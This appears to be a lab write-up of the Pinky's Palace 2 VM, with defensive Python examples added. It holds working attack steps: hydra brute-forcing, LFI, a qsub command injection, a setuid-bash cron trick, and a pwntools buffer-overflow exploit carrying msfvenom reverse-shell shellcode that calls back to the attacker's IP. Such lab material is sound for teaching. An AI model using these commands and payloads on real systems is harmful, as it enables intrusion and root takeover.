27 Pinky's Palace 2

image-20241201182025178

Information gathering

arp-scan -l
nmap --min-rate 100000 -p- 192.168.240.134
nmap --min-rate 100000 -p80,4655,7654,31337 -A 192.168.240.134

dirsearch -u 192.168.240.133
dirb http://192.168.240.133/
nikto -host 192.168.240.134 -p 80
wpscan --url http://192.168.240.134 --enumerate u   # enumerate users
└─# nmap --min-rate 100000 -p- 192.168.240.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-01 18:20 CST
Nmap scan report for 192.168.240.134
Host is up (0.0059s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
4655/tcp open unknown
7654/tcp open unknown
31337/tcp open Elite
MAC Address: 00:0C:29:2E:ED:51 (VMware)
80/tcp    open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Pinky's Blog – Just another WordPress site
|_http-generator: WordPress 4.9.4
4655/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
| ssh-hostkey:
| 2048 ac:e6:41:77:60:1f:e8:7c:02:13:ae:a1:33:09:94:b7 (RSA)
| 256 3a:48:63:f9:d2:07:ea:43:78:7d:e1:93:eb:f1:d2:3a (ECDSA)
|_ 256 b1:10:03:dc:bb:f3:0d:9b:3a:e3:e4:61:03:c8:03:c7 (ED25519)
7654/tcp open http nginx 1.10.3
|_http-server-header: nginx/1.10.3
|_http-title: 403 Forbidden
31337/tcp open Elite?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, NULL, RPCCheck:
| [+] Welcome to The Daemon [+]
| This is soon to be our backdoor
| into Pinky's Palace.
| GetRequest:
| [+] Welcome to The Daemon [+]
| This is soon to be our backdoor
| into Pinky's Palace.
| HTTP/1.0
| HTTPOptions:
| [+] Welcome to The Daemon [+]
| This is soon to be our backdoor
| into Pinky's Palace.
| OPTIONS / HTTP/1.0
| Help:
| [+] Welcome to The Daemon [+]
| This is soon to be our backdoor
| into Pinky's Palace.
| HELP
| RTSPRequest:
| [+] Welcome to The Daemon [+]
| This is soon to be our backdoor
| into Pinky's Palace.
| OPTIONS / RTSP/1.0
| SIPOptions:
| [+] Welcome to The Daemon [+]
| This is soon to be our backdoor
| into Pinky's Palace.
| OPTIONS sip:nm SIP/2.0
| Via: SIP/2.0/TCP nm;branch=foo
| From: <sip:nm@nm>;tag=root
| <sip:nm2@nm2>
| Call-ID: 50000
| CSeq: 42 OPTIONS
| Max-Forwards: 70
| Content-Length: 0
| Contact: <sip:nm@nm>
|_ Accept: application/sdp
MAC Address: 00:0C:29:2E:ED:51 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
└─# nikto -host 192.168.240.134 -p 80
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.240.134
+ Target Hostname: 192.168.240.134
+ Target Port: 80
+ Start Time: 2024-12-01 18:36:12 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Drupal Link header found with value: <http://pinkydb/index.php?rest_route=/>; rel="https://api.w.org/". See: https://www.drupal.org/
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: DEBUG HTTP verb may show server debugging information. See: https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017
+ /secret/: Directory indexing found. # there is a wordlist here: 88907000666, pinkydb
+ /secret/: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version.
+ /wordpress/wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ /wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /wp-login.php: Wordpress login found.
+ 8103 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2024-12-01 18:36:26 (GMT8) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
[+] pinky1337
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

Penetration testing

Knock the ports

import itertools
import subprocess

# Every ordering of the three numbers found under /secret; the sequence is
# unknown, so try each permutation
numbers = [8890, 7000, 666]
combinations = list(itertools.permutations(numbers))

# Try one ordering with the knock tool
def run_knock(combo):
    command = ["knock", "-v", "192.168.240.134", *map(str, combo)]
    print(" ".join(command))
    subprocess.run(command)  # run the tool as a child process

if __name__ == '__main__':
    for combo in combinations:
        run_knock(combo)

Now Kali can reach port 7654 and port 31337.

image-20241201202539498image-20241201202611572

We know this is pinky's blog, so the account should be pinky. Combine that with the string given above (pinkydb) and every word on the port 80 site into one wordlist, and brute-force the login form with it:

cewl http://pinkydb/ -w dict.txt
hydra -L dict.txt -P dict.txt pinkydb -s 7654 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Invalid Username or Password"

image-20241201203120974

image-20241201203844293

Pinky:Passione gets us in. Inside there is a key and this note:
- Stefano
- Intern Web developer
- Created RSA key for security for him to login

SSH login as Stefano
ssh stefano@192.168.240.134 -p 4655 -i id_rsa fails to log in: the key is protected by a passphrase.
Use john to crack the passphrase. Before that, the key has to be converted into a hash john understands, which is what ssh2john is for: ssh2john id_rsa > id2_rsa
john --wordlist=/usr/share/wordlists/rockyou.txt id2_rsa   # cracked: secretz101

image-20241201204829484

image-20241201204935923

image-20241201205012580

Privilege escalation

Under tools there is a file called qsub, with the note "Pinky made me this program so I can easily send messages to him", meaning the program is used to send messages to pinky. cat shows permission denied.
python3 -m http.server to open a port and pull the file down... it will not let me download it.
After a lot more information gathering I found the file inclusion here; try including qsub through it: http://pinkydb:7654/pageegap.php?1337=../../../../../../home/stefano/tools/qsub
wget http://pinkydb:7654/pageegap.php?1337=../../../../../../home/stefano/tools/qsub downloads it successfully.

image-20241201210422445

image-20241201211039219

I have run into this kind of challenge before: vulnhub-18pwnlab-init/

Use ; to terminate the preceding statement and append the command to run: ./qsub "123;/bin/bash -p;" opens a shell with the elevated privileges. It prompts for a password; echo $TERM prints xterm-256color.
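The qsub bug has the classic shape of a command-injection flaw: user input is pasted into a command string that is handed to a shell, so a `;` in the input ends the intended command and starts another. The Python below is an added example, not code from the writeup or from the VM. It reconstructs that pattern (the command string format and the messages file path are assumptions) next to two hardened alternatives: appending the message to a file with no shell involved at all, and, where an external program is genuinely needed, passing the message as a single argv element. The helper names are mine.

```python
import os
import subprocess
import sys
import tempfile

# Characters with which a message could break out of a shell command string.
SHELL_META = set(";|&$`<>()\n\"'\\")

def build_vulnerable_command(msg: str, outfile: str) -> str:
    """Assumed pattern behind qsub: the message is glued into a command string
    for system(). Returned as a string only; it is never executed here."""
    return f"echo {msg} >> {outfile}"

def is_clean_message(msg: str) -> bool:
    """Allow-list check for the case where a shell really cannot be avoided."""
    return msg.isprintable() and not (set(msg) & SHELL_META)

def send_message_safely(msg: str, outfile: str) -> str:
    """Hardened form: append the message directly. No shell is involved, so
    ';' and friends are ordinary characters. Returns the line written."""
    line = msg.replace("\n", " ") + "\n"      # keep one message per line
    with open(outfile, "a", encoding="utf-8") as fh:
        fh.write(line)
    return line

def echo_via_argv(msg: str) -> str:
    """If an external program must be called, pass the message as one argv
    element instead of through a shell. The Python interpreter stands in for
    the callee so the example runs anywhere; a ';' inside msg stays literal."""
    result = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", msg],
        capture_output=True, text=True, check=True)
    return result.stdout.rstrip("\n")

def demo(msg: str = "123;/bin/bash -p;") -> dict:
    """Run the three paths on one message (by default the injection string
    from the writeup) and return what each produced."""
    with tempfile.TemporaryDirectory() as tmp:
        outfile = os.path.join(tmp, "messages.txt")
        send_message_safely(msg, outfile)
        with open(outfile, encoding="utf-8") as fh:
            stored = fh.read()
    return {
        # /home/pinky/messages.txt is an assumed path, not taken from the VM
        "vulnerable_command": build_vulnerable_command(msg, "/home/pinky/messages.txt"),
        "separators_in_command": build_vulnerable_command(msg, "x").count(";"),
        "clean": is_clean_message(msg),
        "stored_line": stored,
        "argv_echo": echo_via_argv(msg),
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The vulnerable string shows two `;` separators for the injection message, which is exactly why the shell runs /bin/bash -p; the file-append and argv paths carry the same message through untouched, and the allow-list rejects it if a shell must be used.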

image-20241201211616282

pinky should be the developer's account; it is still not root, so keep gathering information.

image-20241201211740242

Notice that this txt file looks familiar: look at the second screenshot above; the messages that were sent are saved in this txt file. Maybe a second privilege escalation, but I cannot find a way to use it.
cat .bash_history to look at the command history; it shows /usr/local/bin/backup.sh.
Run newgrp to refresh the group membership, then cat /usr/local/bin/backup.sh; it just backs up the website.
cat /etc/crontab to look at the scheduled tasks: every executable under /usr/local/bin is run by root as a cron job.
Try writing a shell into it, which should pop a shell as the root account:
cp /bin/bash /tmp/shell   # copy bash to /tmp as a file named shell
chmod ugo+x /tmp/shell    # make it executable for everyone
chmod u+s /tmp/shell      # set the setuid (or setgid) bit for the user class given in the who argument, so the file runs with its owner's privileges when executed
This is a different way of popping a shell.
Now go to /tmp and wait half an hour. The shell file has not been created yet, so go play some Overwatch first.
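The cron finding above is a file-permission problem: a job that root runs on a schedule points at something other users can modify. The Python below is an added example, not part of the writeup. It parses /etc/crontab-style lines and reports every absolute path in a root job that is writable by group or others (or, for root jobs, not owned by root), expanding a `dir/*` target to the directory's contents, as the /usr/local/bin job in the writeup works. The demo builds its own temporary directory and crontab text; nothing here reads the real target. Names such as audit_job are mine.

```python
import os
import stat
import tempfile

def parse_system_crontab(text: str) -> list:
    """Return (user, command) pairs from /etc/crontab-style text: five time
    fields, then the user the job runs as, then the command line."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split(None, 1)[0]:      # environment lines such as PATH=...
            continue
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue
        jobs.append((fields[5], fields[6]))
    return jobs

def writable_by_others(st: os.stat_result) -> bool:
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_job(user: str, command: str) -> dict:
    """Map each risky path named in the command to the reasons it is risky.
    A 'dir/*' target is expanded to the directory and everything in it."""
    findings = {}
    for token in command.split():
        if not token.startswith("/"):
            continue
        path = token[:-1] if token.endswith("/*") else token
        try:
            st = os.stat(path)
        except OSError:
            continue                               # path does not exist: nothing to check
        targets = [path]
        if stat.S_ISDIR(st.st_mode):
            targets += [os.path.join(path, name) for name in sorted(os.listdir(path))]
        for target in targets:
            try:
                tst = os.stat(target)
            except OSError:
                continue
            reasons = []
            if writable_by_others(tst):
                reasons.append("writable by group or others")
            if user == "root" and tst.st_uid != 0:
                reasons.append(f"owned by uid {tst.st_uid}, not root")
            if reasons:
                findings[target] = reasons
    return findings

def demo() -> dict:
    """Constructed scenario so it runs anywhere: a root job that executes
    everything in a temporary directory holding one world-writable script and
    one that only its owner can modify. Keys are file names."""
    with tempfile.TemporaryDirectory() as tmp:
        bad, good = os.path.join(tmp, "backup.sh"), os.path.join(tmp, "rotate.sh")
        for script in (bad, good):
            with open(script, "w") as fh:
                fh.write("#!/bin/sh\ntar czf /var/backups/site.tgz /var/www\n")   # placeholder body
        os.chmod(bad, 0o777)      # anyone can edit it: the misconfiguration
        os.chmod(good, 0o755)     # owner-only write
        crontab = f"SHELL=/bin/sh\n*/30 * * * * root {tmp}/*\n"   # constructed, modelled on the writeup
        results = {}
        for user, command in parse_system_crontab(crontab):
            for path, reasons in audit_job(user, command).items():
                results[os.path.basename(path)] = reasons
    return results

if __name__ == "__main__":
    for name, reasons in demo().items():
        print(f"{name or '<directory>'}: {', '.join(reasons)}")
```

Running it on a real host means feeding open("/etc/crontab").read() to parse_system_crontab and calling audit_job on each pair; anything it lists for a root job is a path to lock down to root:root with mode 755 or tighter.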

image-20241201213032589image-20241201212816594

OK, ./shell -p now has full pinky privileges.
Check the processes running as root: ps -aux | grep root

image-20241201221843464

This process looks odd. strings /daemon/panel shows it is a backdoor; download it.

image-20241201222100289

Load it into IDA and press F5.
v8 is the message content, stored in the variable buf.
Whatever we input is stored in buf and then passed as an argument to the handlecmd function.
Double-click handlecmd.

image-20241201222449226

image-20241201222516746

buf is passed to the handlecmd function.
handlecmd defines a string buffer of 112 bytes and calls strcpy, which copies without regard to length, so a long input can overflow the stack.
Based on this, in theory 112 bytes fill the buffer; then comes one more word (8 arbitrary bytes on a 64-bit program), and after that the return address.
The pseudocode shows that the message sent by send() is the banner we saw during information gathering when nc connected to port 31337 on the target. Running the program on Kali opens port 31337, so the service on the target's port 31337 is this program.
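Whether an overflow like this can be turned into code execution the way the writeup goes on to do depends on three build-time properties: no stack canary (otherwise the smashed frame is detected before handlecmd returns), an executable stack (the shellcode arrives inside the message and sits in buf), and a non-PIE binary (the fixed return address 0x400cfb). The Python below is an added example, not anything from the writeup or from the daemon's author. It reads those three properties from a 64-bit little-endian ELF image with struct: e_type for PIE, the PT_GNU_STACK program header for NX, and, as a heuristic, the presence of the __stack_chk_fail name that the stack protector links in. make_minimal_elf assembles a synthetic image so the example runs without the daemon binary; pass a file path to audit a real one.

```python
import struct

PT_GNU_STACK = 0x6474E551   # program header describing the stack's permissions
PF_X = 0x1                  # executable bit in p_flags
ET_EXEC, ET_DYN = 2, 3      # fixed-address executable vs. position-independent (PIE or shared object)

def elf_hardening(data: bytes) -> dict:
    """Report pie / nx / canary for a 64-bit little-endian ELF image.
    canary is a heuristic: the __stack_chk_fail symbol name is present in the
    file when the binary was built with a stack protector."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 2 or data[5] != 1:
        raise ValueError("this example only handles 64-bit little-endian ELF")
    e_type = struct.unpack_from("<H", data, 16)[0]
    e_phoff = struct.unpack_from("<Q", data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    nx = None  # stays None if there is no PT_GNU_STACK header (loader default applies)
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
    return {
        "pie": e_type == ET_DYN,
        "nx": nx,
        "canary": b"__stack_chk_fail" in data,
    }

def make_minimal_elf(e_type: int, stack_flags: int, with_canary_symbol: bool) -> bytes:
    """Constructed test image: a 64-bit ELF header plus a single PT_GNU_STACK
    program header. Not loadable, but enough for elf_hardening to inspect."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8      # ELFCLASS64, little-endian, version 1
    header = ident + struct.pack("<HHIQQQIHHHHHH",
        e_type, 0x3E, 1,          # e_type, e_machine (x86-64), e_version
        0, 64, 0, 0,              # e_entry, e_phoff (right after the header), e_shoff, e_flags
        64, 56, 1, 64, 0, 0)      # e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
    phdr = struct.pack("<IIQQQQQQ", PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)
    tail = b"__stack_chk_fail\x00" if with_canary_symbol else b""
    return header + phdr + tail

def explain(report: dict) -> list:
    """Turn the report into the defender's to-do list."""
    advice = []
    if not report["pie"]:
        advice.append("fixed load address: build with -fPIE -pie so code addresses are not predictable")
    if report["nx"] is False:
        advice.append("executable stack: link with -Wl,-z,noexecstack")
    if not report["canary"]:
        advice.append("no stack protector found: compile with -fstack-protector-strong")
    return advice

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        image = open(sys.argv[1], "rb").read()         # audit a real binary
    else:
        image = make_minimal_elf(ET_EXEC, 0x7, False)  # RWX stack, no PIE, no canary: the weak configuration
    report = elf_hardening(image)
    print(report)
    for line in explain(report):
        print(" -", line)
```

On the synthetic weak image all three checks fail, which is the combination the later exploit relies on; a binary built with the three flags in explain() would report pie, nx and canary all true, and the same strcpy bug would then crash instead of handing over control.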

Use msfvenom to generate shellcode, excluding the bad character "\x00", which would truncate the copy:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.240.130 LPORT=1115 -f python -b '\x00'

image-20241202003441734

from pwn import *  # pwntools, a Python library for exploit development and binary analysis

buf = b""
buf += b"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d"
buf += b"\x05\xef\xff\xff\xff\x48\xbb\x40\xe4\x27\xed\x21"
buf += b"\xa5\x99\x6e\x48\x31\x58\x27\x48\x2d\xf8\xff\xff"
buf += b"\xff\xe2\xf4\x2a\xcd\x7f\x74\x4b\xa7\xc6\x04\x41"
buf += b"\xba\x28\xe8\x69\x32\xd1\xd7\x42\xe4\x23\xb6\xe1"
buf += b"\x0d\x69\xec\x11\xac\xae\x0b\x4b\xb5\xc3\x04\x6a"
buf += b"\xbc\x28\xe8\x4b\xa6\xc7\x26\xbf\x2a\x4d\xcc\x79"
buf += b"\xaa\x9c\x1b\xb6\x8e\x1c\xb5\xb8\xed\x22\x41\x22"
buf += b"\x8d\x49\xc2\x52\xcd\x99\x3d\x08\x6d\xc0\xbf\x76"
buf += b"\xed\x10\x88\x4f\xe1\x27\xed\x21\xa5\x99\x6e"

ret = p64(0x400cfb)  # pack the address 0x400cfb as 8 little-endian bytes; this is the return address that controls execution after the overflow
# ret = "\xfb\x0c\x40\x00"
print(ret)
payload = buf + ret  # buf followed by ret: the input that overflows the stack buffer and redirects execution to 0x400cfb
r = remote("192.168.240.134", 31337)  # connect to the daemon listening on port 31337 of the target
r.recv()  # read the banner so the receive buffer is empty
r.send(payload)  # send the payload, triggering the overflow
print("ok")

image-20241202003420793

Run it and we get root.

image-20241202003519154

That was hard.